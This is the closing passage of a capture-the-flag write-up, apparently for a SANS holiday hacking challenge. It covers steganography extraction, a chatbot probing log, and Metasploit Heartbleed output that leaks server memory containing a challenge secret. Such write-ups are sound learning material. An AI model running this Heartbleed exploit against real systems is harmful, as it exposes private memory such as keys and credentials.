I didn’t find anything in the image so if there was a secret in this one I suspected that steganography may have been used. While doing some further investigation I decided to take a look to see what bulk_extractor may have found. In the url_histogram I found a URL outlier that indicated the owner of the USB drive visited a link to a steganography tool.
I downloaded the steganography tool and ran it against the image.

root@siftworkstation:/home/sansforensics# java -jar Downloads/f5.jar x -e out.txt Desktop/cases/HackingFuture/unallocated/jpg/00001536.jpg
Huffman decoding starts
Permutation starts
423168 indices shuffled
Extraction starts
Length of embedded file: 116 bytes
(1, 127, 7) code used
Upon checking the output file I found that USB Secret #4 was revealed.
6. Summary
Well there you have my submission to this year’s challenge.
The two secrets that took most of my time were Eliza and Web Secret #2.
I have to give recognition to my friend Fred for the amount of time put in on Web Secret #2. I was well into the challenge with 5 of 7 secrets complete before traveling from NOVA to Metro Detroit for Christmas. While spending the holiday at his house I got him interested in the challenge. Web Secret #2 had us up until 4am on Christmas trying various versions of the syntax to get the secret. Our wives thought we were nuts but a couple of 7 year olds introduced them to Subway Surfers on their phones so they were content/hooked and stayed up with us until our Mac batteries died.
The next day we continued to hammer away on the proper syntax to use for this approach. We knew what we were going after while trying the various permutations and eventually the /secret file found at the root of the web server’s file system was revealed. This challenge became an addiction and I guess I should apologize to the family on SANS behalf for ruining the holiday. :)
Now that this is over here is the tweet I sent out on New Years Day:
I want to thank the SANS team that put this exercise together. I understand that a lot of time and effort goes into creating these challenges and I believe you all did an outstanding job with it. I really enjoyed the variety of this challenge and how it allowed me to use a wide range of skills and tools. I am looking forward to the next one.
Appendix A: Eliza Log File
This is the automated log file from my python script showing Eliza’s unique responses and the words that triggered the response.
I AM ELIZA. WHAT'S ON YOUR MIND?
> doctype
PLEASE CONTINUE
> html
ARE YOU NORMALLY SO SHAMBOLIC?
> public
I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?
> w
GO ON
> dtd
THAT SOUNDS LIKE A DODDLE
> transitional
ARE YOU DISCHUFFED?
> en
BRILLIANT
> http
HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
> www
BASH ON WITH IT THEN
> tr
YOU'RE BEING A BIT WOOLY WITH ME
> dtd
WHAT DOES THAT SUGGEST TO YOU?
> dtd
WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?
> conditional
I AM NOT SURE I UNDERSTAND YOU FULLY
> stylesheets
KEEN
> if
WHAT DO YOU THINK ABOUT?
> ie
THAT ISN'T BLINDING, IS IT?
> no
WHY NOT?
> ie
DO YOU NORMALLY NATTER ON LIKE THAT?
> if
DO YOU WISH THAT?
> ie
VERY INTERESTING
> no
ARE YOU SAYING 'NO' JUST TO BE NEGATIVE?
> if
DO YOU REALLY THINK IT'S LIKELY THAT?
> no
YOU ARE BEING A BIT NEGATIVE.
> name
I AM NOT INTERESTED IN NAMES
> challenge
A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> link
I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
> challenge
YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> link
I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
> link
YOU SEEM LIKE A NICE PERSON. I THINK I CAN TRUST THE LINKS YOU SEND ME.
> '
> challenge
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
> am
WHY DO YOU SAY 'AM?'
> because
IS THAT THE REAL REASON?
> am
I DON'T UNDERSTAND THAT
> if
REALLY--IF?
> what
WHAT IS IT YOU REALLY WANT TO KNOW?
> turing
DR. TURING? I THINK OF HIM AS A DEAR FATHER, AND I AM DEEPLY PROUD OF HIS WORK.
> someone
CAN YOU BE MORE SPECIFIC?
> yes
I UNDERSTAND
> what
WHAT COMES TO YOUR MIND WHEN YOU ASK THAT?
> because
WHAT OTHER REASONS MIGHT THERE BE?
> always
CAN YOU THINK OF A SPECIFIC EXAMPLE?
> what
WHY DO YOU ASK?
> what
DOES THAT QUESTION INTEREST YOU?
>
Appendix B: Website Secret #2 - Metasploit Output
The secret is highlighted in the output below.

msf auxiliary(openssl_heartbleed) > run

[*] 23.239.15.124:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 5494c305b0b7e7c56c1af10ae143798b7e24545d1a4d3fef39f80f61bcab4962
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 1179c7915bd1ad5550bd974caa909e427f506cb3d0e10a667cddd197842532fc
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 584
[!] Handshake #1:
[!] Length: 580
[!] Type: Certificate Data (11)
[!] Certificates length: 577
[!] Data length: 580
[!] Certificate #1:
[!] Certificate #1: Length: 574
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 397
[!] Handshake #1:
[!] Length: 393
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 23.239.15.124:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 5494c30f77d3dc41fb7f94861c1ecc1dedc3b0eee33a08642cbdb931ba06b71e
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 635e1fd4a117449ded6a77aef2d8f3f4c8983b6d0e2c34415b68ff05b7f4406d
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 584
[!] Handshake #1:
[!] Length: 580
[!] Type: Certificate Data (11)
[!] Certificates length: 577
[!] Data length: 580
[!] Certificate #1:
[!] Certificate #1: Length: 574
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 397
[!] Handshake #1:
[!] Length: 393
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 23.239.15.124:443 - Sending Heartbeat...
[*] 23.239.15.124:443 - Heartbeat response, 65535 bytes
[+] 23.239.15.124:443 - Heartbeat response with leak
[*] 23.239.15.124:443 - Printable info leaked: T~V4<Dpf"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e,]S4W60f(7`@@a@}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!FB9#SNcf!nIg!kwP[Qc/,87!"RI(N6;yf+eO#<EL-HJ]#0*zZxs&yhX]A'k+"qq!k\{jMYnuW_}_:ygq6Z25hi 0E=pYZ+#a'u0rN}6uf<"]LtdXV"o0^v=)5)0U00*HO]9Td6HY9cgzC)-TR>Xp04gUK]hiL[viO`GiuTKTfn+Q/:TZSZumUx_'[$@CFoioA(S\~G*H"q&<'U_Tg,%0)fH'Y]d@&^UF?HIJMr*V9/Fa3Pn/0~$Yk%A5\0\up?OcG`JO51DYdOQNJNdO<JSg~)v{6W'XdgZ/g:sO>r}sEA]f|i{=CamW2[ZSehM>i#O6*CUlAode{dl.bi|J3*NH"d`MDHY%nwXZ:l#BVGB!SRm8=H]3F<*W @dfMb`SknaSYy)+L0p>TST7WENY`JPx4RvzSyn5]X{{!`b}5+x%^YldtiHW\3n9Y3`|r}+@&y8N%-"xM ,]83zjw{[{ &R$SW[|[l].,ctW[E#zyta06aPxpg;Ip_,1mw(qNA'?+W[F'_7<hp{TM2A<:BRZAu!<N=PO-H7IG^mm1OJe}pkEN[CR3|6)tCT$K!>'Uv3]*)YbEu<8k}MLmLp(k{M'5KEAa:Y^SS!FqJ}xEd\!fx2MjB0;J h:b[8SpPWcF0sebw[}/va2`$&E4@,|5{I#\U\B,0IFO)`tK&]zgU4O<kV@)4<iw$fOV3E^6}_hqWM}|me_D_U OxyQ5(&#A
K\&z+m(QWPn2Cf?i_/a2d>6=USoG!32~}TH;EMMe#ih5GGmX6}HY=v%g}XD/KRe&Z8FTvRll2HiZP6K|%}sQ5#[=`f_Q?.zZ !+NsKj*-2j!p3p(4.=mK{iR#wtMB]fvgxjaFa7;K%SoaKB[lgz\@^$_fb\)vlnE8K:|XP*N ~zw^#a$)WDL-p=oS2rebl:Y wWlj_]8T?K_lbX$"KO:8Qvrtz6,p_eWA};Y!>fTf_%8:%Q#v7_QtyO\lgrKVO`zVFmPqMM`|lt<Tsib?SwB?s:T}(HBIa@h\6(8MZ %X\O'[@sBXAE2`&~<wN~crC^A&}*l(F~S;,"pUn1>KP(B50}T]y @CG{p=ZsUBfO>uj2LJa(%qsXugR(*s>?bVF5c+zo6tYA#"b<c_ tR0aStJ&0tAt=-6!be<=3$YtA9KW(rX(r{&-eiX^9:f)p+V,xbSxXuc)BqssI)TA}J!.=QVq2R{,U"i^KNu6v*l>NaQ#ePsOnE~oRZ(W>b`aB]y1C{{CP@VW#rZ["hvBKn'YPzd=)Ju1REO,aC~qqZGX[&zM9f8q)&YAE^/sg=Sd[umd5AHM4YPwd94A^/H=z8S@e6lej4E @`57=-z3'%j h*Ig~cXa1FRB1y*=u*u|Uu>L @CT8^_qL:P!k8?[)sW&[,|HnP3sK=1/~{F&,4-/|!>aVh!bV+9}15wAe9wwt]E0,z?l=QOsq6l4ut?r`#qOcp9r@%IRYzz~m8H2%4F%'7$]3QxB_HYFbgY(,uy-6u()9n@2Bg{P'5f='D)CrP#`})=5|c!EkW ^_H9(2+Vx:C@o_k.~x.{i~#2h32.SoWWt3}P88h1g:]Tvw-9MswDc+%/|U9.igAD{+-Aa"mHmflsgnkThAmIzr8*R`D%#e>POrJ)&LG|Bp?{*h7NL\e }8-.wvBt6f,<T;AKgyux\}<;9sF<R%SSiDDY;~d>o]@\U_7Gyn* `@!<Dpf"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e,]S4W60f(7`
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed